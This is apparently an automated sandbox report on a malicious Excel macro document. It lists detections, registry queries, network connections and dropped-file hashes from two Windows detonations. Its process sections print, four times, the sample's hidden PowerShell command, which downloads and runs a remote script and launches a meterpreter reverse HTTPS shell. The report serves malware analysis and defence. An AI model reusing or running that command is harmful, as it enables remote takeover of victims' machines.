Malware Analysis Report

2025-01-22 19:14

Sample ID 240721-1enataxhqm
Target ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c
SHA256 ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c
Tags
macro macro_on_action execution
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c

Threat Level: Known bad

The file ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action execution

Process spawned unexpected child process

Blocklisted process makes network request

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-21 21:33

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-21 21:33

Reported

2024-07-21 21:35

Platform

win7-20240704-en

Max time kernel

26s

Max time network

19s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c.xls

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\wscript.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c.xls

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force

C:\Windows\SysWOW64\wscript.exe

wscript C:\Users\Public\config.vbs

C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | raw.githubusercontent.com | udp
US | 185.199.111.133:443 | raw.githubusercontent.com | tcp
US | 185.199.111.133:443 | raw.githubusercontent.com | tcp
US | 185.199.111.133:443 | raw.githubusercontent.com | tcp
US | 185.199.111.133:443 | raw.githubusercontent.com | tcp

Files

memory/2684-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2684-1-0x0000000071DDD000-0x0000000071DE8000-memory.dmp

memory/2684-3-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-2-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-4-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-13-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-18-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-6-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-5-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-27-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-32-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-37-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-38-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-19-0x0000000000590000-0x0000000000690000-memory.dmp

C:\Users\Public\config.vbs

MD5 ce52ab154163c511f0efa6a61e22ab64
SHA1 9f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256 df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512 cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

memory/2528-45-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

memory/2528-44-0x000000001B300000-0x000000001B5E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0B4068X96BB8520C6HQ2.temp

MD5 28716fb64b51e2ada2c528f0043f2e75
SHA1 2eb7af6edc1291ab9dbceb64d55c34e5c72336cf
SHA256 f6d5b360a949e10c606cdda941b2056db8b0b27137e7634f61149f28a799e6cc
SHA512 14933f5d0a3612133a1f9f105e9b223ef07807b6cfeddc66abac47f3605f1e831af7880b906e967e6436ebcc3c8c0a6786c39dcefbac7fed49e9c7efc5fb8cd7

memory/2684-48-0x0000000071DDD000-0x0000000071DE8000-memory.dmp

memory/2684-49-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-50-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-51-0x0000000000590000-0x0000000000690000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-21 21:33

Reported

2024-07-21 21:35

Platform

win10v2004-20240709-en

Max time kernel

46s

Max time network

39s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\wscript.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\wscript.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force

C:\Windows\SYSTEM32\wscript.exe

wscript C:\Users\Public\config.vbs

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | raw.githubusercontent.com | udp
US | 185.199.111.133:443 | raw.githubusercontent.com | tcp
US | 185.199.111.133:443 | raw.githubusercontent.com | tcp
US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.237:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp
US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 121.150.79.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp

Files

memory/1624-0-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-1-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-2-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-3-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-4-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-5-0x00007FFE41CCD000-0x00007FFE41CCE000-memory.dmp

memory/1624-9-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-8-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-7-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-6-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-10-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-11-0x00007FFDFF4E0000-0x00007FFDFF4F0000-memory.dmp

memory/1624-13-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-12-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-14-0x00007FFDFF4E0000-0x00007FFDFF4F0000-memory.dmp

memory/1624-15-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-20-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-17-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-16-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-21-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-23-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-22-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-19-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-18-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-31-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-32-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-42-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-44-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-43-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

C:\Users\Public\config.vbs

MD5 ce52ab154163c511f0efa6a61e22ab64
SHA1 9f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256 df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512 cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0weujvqw.afp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4372-55-0x00000265C7A90000-0x00000265C7AB2000-memory.dmp

memory/4372-68-0x00000265C7B10000-0x00000265C7B54000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 61a6ee65a0551d6bd2d8cfc42fe15f5a
SHA1 b32563f29c4a8cee0941d6f53498cb42ebdb3c51
SHA256 0c813cf51f2ff57c6f29292e2f60228b1957a18073b1c56d188669f72f0d3b39
SHA512 43e439c7211a94c9daf69c682b4c053210e99f8c0ccc5d5782bf003f6907f8b8b24b73f45bcbac82ecfc79d65b4371f06b662a15899bff8411742ff91a9879c2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/1624-77-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-78-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp